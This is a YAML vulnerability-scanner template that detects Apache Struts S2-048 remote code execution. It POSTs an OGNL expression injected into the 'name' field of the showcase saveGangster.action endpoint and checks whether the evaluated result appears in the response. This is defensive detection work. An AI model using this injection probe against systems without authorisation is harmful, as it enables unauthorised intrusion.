id: struct-s2-048
info:
  name: Apache Struct S2-048 - RCE
  risk: High

requests:
  - method: POST
    redirect: true
    url: >-
      {{.BaseURL}}{{.Path}}/integration/saveGangster.action
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: >-
      age=1&__checkbox_bustedBefore=true&name=${191191191*7}&description=1
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "1338338337")

reference:
  author: theblackturtle
